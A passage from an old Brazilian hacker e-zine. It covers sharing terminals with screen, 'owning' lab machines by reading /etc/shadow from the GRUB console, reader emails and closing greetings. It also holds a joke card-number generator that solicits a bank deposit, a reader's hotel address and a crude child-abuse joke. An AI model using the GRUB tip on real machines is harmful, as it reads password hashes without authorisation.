VERSAO DEMO * * BY CHEAT STRUCK * * * * * * USE: gcc freecell.c -o freecell * * ./freecell * * * * * *************************************************/ #include int main() { printf("Free Cell - by Cheat Struck\n"); printf("Gerrador de numeros de cartao para celulares pre-pagos.\n"); printf("Versao Demo\n"); printf("\n\n ATENCAO! Para adquirir a vrsao full faca um deposito de R$10,00" \ " na seguinte conta:"); printf("\n\n BANCO DO BRASIL\n AGENCIA 2375-2\n CONTA 21.345-2\n\n"); } <--> _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by Cheat Struck _____________15. Compartilhando Terminais - Screen _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ _________________________________ ______________ _____.___ O screen eh uma ferramenta cheia de funcoes interessantes, porem nesta materia vou apresentar apenas uma delas. Como usa-la para compartilhar terminais ala ttysnoop. Os linux mais novos nao vem com os pacotes do ttysnoop por algum motivo. Com o screen eh possivel fazer o mesmo que faziamos com o ttysnoo: dois ou mais usuarios acessarem a mesma shell no mesmo terminal. Para que isso eh util? Continua lendo antes de falar merda.... Antes de mais nada, configure o screen para modo multiuser. Abra o arquivo /etc/screenrc e coloque a linha: multiuser on Agora todos os screens abertos serao por padrao no modo multiuser, portanto eh possivel que usuarios com o mesmo login compartilhem o mesmo terminal trocando mensagens. Para isso, em um terminal rode o screem: [Terminal 1] root@struck:~# screen root@struck:~# No outro terminal digite: [Terminal 2] root@struck:~# screen -ls There is a screen on: 733.tty1.struck (Multi, attached) 1 Socket in /root/.screen. O comando -ls lista os screens rodando no momento para o usuario. Repare que esta screen este rodando em modo Multiuser, portanto eh possivel que dois ou mais usuarios o acessem ao mesmo tempo... para isso ainda neste terminal faca: [Terminal 2] root@struck:~# screen -x 733.tty1.struck Neste momento voce passa a compartilhar a mesma tela nos dois terminais. Legal neh? Nao achou utilidade? Tinha que ver o que era entao eu, o narfy, o pchazard nas epocas de hacker logados tudo na mesma maquina e no mesmo tty... foi de lances assim que sairam as melhores ideias ja publicadas na f3. Por hora eh soh... nao vou falar muita coisa sobre isso pq ja percebi que quanto menor a materia, mais gente a le, entao se voce se interessou vai ler as man-pages do screen e seja criativo no que mais pode fazer com ele. Issu ae ! Dica... coloque-o como shell no /etc/passwd... ;) _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by Cheat Struck _____________16. Ownando via Grub _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ _________________________________ ______________ _____.___ Chega a ser ridiculo o nivel de protecao local de algumas maquinas. Maquinas de laboratorios de rede que rodam dois ou mais sistemas certamente possuem um Boot Loader para selecionar qual o OS que o usuario deseja iniciar. Eh comum encontrar o lilo instalado na maioria, mas o mais moderno que vem junto com varias distribuicos do linux e outros eh o GRUB. Ao iniciar a maquina e cair no menu do Grub, ao inves de escolher o sistema digite 'e' para entrar no modo console... De um tab para ter a lista de comandos possiveis de executar. O help tambem pode ajudar se quizer fucar um pouco... Mas a manha aki eh a seguinte... cat /etc/shadow Nao eh que funciona. =) _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by Cheat Struck _____________17. 3-m4ilz _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ _________________________________ ______________ _____.___ Ih! faz tempo q nao sai edicao... tambem chegou bastante e-mails nesse periodo... Dei uma filtrada pra fica soh os bao.... E-mail: cheatstruck@hotmail.com <-- soh vou deixar esse disponivel pra zine agora... De: Bernardo Silva Enviado: sexta-feira, 25 de julho de 2003 09:04:57 Para: cheatstruck@hotmail.com Assunto: Quero saber! SE NAO FOR ENCOMODAR A VC GOSTARIA SE POSSE ENVIAR UM E-MAIL EXPLICANDO-E COMO ACESSAR OUTRA MAQUINA ATRAVES DA INTERNET GOSTARIA MUITO DE SABER VC PODERIA ENVIAR OS PASSOS PARA MIM? ------------- De: anallyser Enviado: domingo, 24 de agosto de 2003 18:42:25 Para: cheatstruck@hotmail.com Assunto: Dzvidas Ae maninhu, eu estava lendo a sua zine(f3-00) e li sobre a matiria da PUCRS, sera que na sua prsxima zine(se tiver) vocj poderia ensianar claramente como i que foi ocorrendo aqueles comandos tco interessantes? Se vocj tiver ICQ, MSN, AIM ou ati mesmo algum knal no mIRC que vc frequente, para que eu possa conversar com vocjs, sem ser por e-mail? Desde ja agradego --------------- De: Daniel Souza Enviado: quarta-feira, 2 de julho de 2003 00:44:26 Para: Assunto: oi viadim oi viadim :D []'s pchazard Resp: cade tu??? Me manda um email! -------------- De: anallyser Enviado: domingo, 7 de setembro de 2003 11:34:59 Para: cheatstruck@hotmail.com Assunto: Dzvidas Ae Struck, blz? Ae, poderia me esclarecer umas coisinhas? -> O que sco hackers? -> Qual a diferenga de um Hacker para um Cracker? -> O que sco phreacks? Aqui no Brasil eles existem? -> O que sco Warez? O que eles fazem? -> O que sco carders? O que eles precisam saber para atuarem? Como sco feitos esses ataques? Poderia me responder isso? Atenciosamente, -| RoB. Ninho |- ------------------- De: cdfdsaf Enviado: sabado, 25 de janeiro de 2003 11:02:14 Para: Assunto: cara zine muito massa adorei sua zine queria falar que se vc naum poderia me ajudar como configurar meu modem mno linux Agradego pela coompreensao farow struck ---------------------- De: anallyser Enviado: domingo, 9 de novembro de 2003 17:10:52 Para: cheatstruck@hotmail.com Assunto: Re:Ajuda Ae maninhu, blz? Ae cara, queria te dizer que eu te mandei um email e acho que vc num respondeu, ou respondeu e num chegou! Ah, mas uma coisinha, eu conheci dois carinhas na internet que sabem tipow, o que eu sei. Owna por pdw, rds, iis, cpanel, etc. Dae surgiu a ideia de fazermos um grupo, mas num sei o que acho disso. Tipow, o que vc acha que eu devo fazer? Faco o grupinho com os carinhas ou i melhor eu ficar so e talz? Ahhhh, eu estava vendo a sua zine f3-01, e vi uma matiria feita por MaskMaster, sobre como explorar a vul. do RDS. Vc conhece algum site que ensine algumas vulnerabilidades? flw ae brow!!! -------------------------- De: oi Enviado: sexta-feira, 5 de dezembro de 2003 17:13:01 Para: Assunto: afffff asssfsdfsafsadfasf sad gay -------------------------- De: Gabriel Favaro Enviado: sexta-feira, 30 de janeiro de 2004 07:11:15 Para: cheatstruck@hotmail.com Assunto: zine ow cara... c foi preso, ta morto, ou coisa parecida agora q tua zine ta muito loka c para de escrever... continua ae.... valeu gabriel ------------------------ De: wesckley henrique xavier de sa Enviado: sexta-feira, 20 de fevereiro de 2004 07:51:30 Para: cheatstruck@hotmail.com Assunto: zine o zine terminou? S}{adow --------------------- De: Alexandre Detoni Enviado: terga-feira, 2 de margo de 2004 15:12:24 Para: cheatstruck@hotmail.com Assunto: aew struck [...] aew tem nenhum emprego rolando ai de qualquer coisa naum ?? prum amigo meu ..redes seguranga programagco ..ASP.... TUDO..... !!!! ele manja mto...e pena que ele tem 2 filhas e tals.... vlw..... --------------------- De: Tuxbad Responder para: Tuxbad Enviado: quarta-feira, 28 de abril de 2004 22:42:16 Para: cheatstruck@hotmail.com Assunto: duvidas - site do kit.net E ai blz ! Agora que o kit.net tirou todos os sites de pessoas que hospedavam la e nao assinam a globo.com vai continuar usando a struck.8m.com ? Ainda pretende continuar com a zine ? Obrigado pela atencao. Tuxbad Resp: Eh.. mas fiz uma catraca e deixei-a no ar novamente... soh agora nao consigo atualizar lah... =P ------------------------- De: Enviado: sexta-feira, 21 de maio de 2004 12:37:06 Para: cheatstruck@hotmail.com struck seu viado.... aqui eh o VENTO.... mande-me beijos.... huahahahahuauhahua Resp: :*** ----------------------- De: funtopia Enviado: quinta-feira, 5 de agosto de 2004 23:15:06 Para: "cheatstruck" Assunto: new hacker pensei q nao ia ter a chance de falar com um hacker tao antigo quanto a propria internet por aqui c ainda entra no irc ? caso entre me diz q canal ------------------------ De: Gilberto Rodrmguez Enviado: quinta-feira, 12 de maio de 2005 20:50:50 Para: cheatstruck@hotmail.com Assunto: Kd Vc Cheat Struck ? As coisas eveluiram aqui na NET temos agora uma tal conexao banda larga que vc precisa ver, usamos uns links de 1 mb/s, isso chega a ser bem rapido pode acreditar...hehe e facilita bastante o nosso trabalho, temos ate email com 1GB espago free, rlz.! hehe. kd vc velho amigo, eu estava respondendo um processo ai por fraude num sistema teleftnico :/, mas tt de volta a ativa, meio que disfargado, mas deixa isso pra la... Terminou a faculdade??? a zine acabou mesmo??? manda noticias porra!!!! Vc tem talento e espero que esteja bem aguardo um return. ASs: TPGA Forever! Resp: Nao sei pq.. mas eu adoro esse cara... ----------------------- De: Carti Responder para: Carti Enviado: terga-feira, 31 de maio de 2005 12:07:05 Para: Cheat Struck Assunto: Re: Soh pra ver quem ta vivo! sua bixa peluda e desdentada eu to em porto elegre no " hotel elevado" apartamento 101 rua farrapos, 63 ligue pra mim ou liga pra (11) 9952-XXXX vamo sai pra toma uma cerveja. kero conhece vc e ver as suas tecnicas de briga, hahahaha abracao Carti ps: liga pra mim seu fdp Resp: ai... os hackos tao na minha cidade!!! Ahhhh!!!! ---------------------- Eh.. chega.. Pro povo da antiga... mandem emails contando comeh q tao as coisas ai nessa tal de internet.. Abraços pra vcs bando de vagabundos!! _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ ___._____ _________ ______________________________________ __________by Cheat Struck _____________18. Th3 3nd??? _____________ ___________________ ________________________ ______________________________________________ ___________ _____________________________ _ __________________________ _________________________________________________________ _________________________________ ______________ _____.___ "17 chamadas nao atendidas" - Meu cell na noite que decidi fechar essa edicao. Isso soh pra ter uma nocao de como ta dificil dedicar um tempo a zine... Bem... essa edicao tava uma merda com certeza e talvez soh venha a melhorar a hora que a gurizada se reunir denovo pra virar as noites no irc falando merda e perdendo tempo aprendendo as manha hackas! Espero que c tenha dado para aproveitar 1% do que foi escrito aki, ja vale a pena, pois essas ultimas edicoes sao apenas para manter o nome da zine vivo ainda.... Tem mta gente dizendo que ja eh mais uma zine extinta, mas nao... isso ainda vai demorar pra acontecer. Pq desde o inicio eu venho frizando que a f3 nao eh nenhum grupo o qual um dia podera acabar... ela eh uma e-zine escrita de leetos para... bem... deveria ser para leetos, mas ultimamente vem atingindo mais o publico novato do que os leetos... O que interessa eh que 2 anos de seca nao acabaram com a zine. Nem que a proxima leve 4 anos para ser lancada... heuehueh.. nanana... prometo q nao demorarah mais tanto assim... =) Bem.. vo deixa um greetz meio curto aki... soh com o pessoal q de vez enquando ainda lembra de manda um email pro velho struck aki... ^^VENTO^^ que ganhou um oculos canudo do chaves e um estojo q vira robo. Carti que tirou fotos no velorio do pai, afinal a familia tava toda reunida. N4rfy que sempre reclama que seu nick eh com n minusculo. Nullz que esta sendo procurado em 19 estados por exploracao sexual de menores. pcHazard que se esconde no banheiro e acaba ficando preso na empresa a noite toda. psaux que peidou no elevador e botou a culpa numa velhinha coitada. snape que foi visto pela ultima vez subindo o morro para comprar maconha e desapareceu. TPGA que se perdeu. Pertence a uma menina de 8 anos q sente muito sua falta. Abracos pra esses cabecas e para muitos outros que ha tempos nao falo... mandem email seus vagabundos! Criticas, opinioes, babacoes de ovo, colaboracoes, sao tudo bem vindas no meu email e respondo assim q possivel... =) Aki acaba essa edicao... Ateh soh Deus sabe quando! _EOF_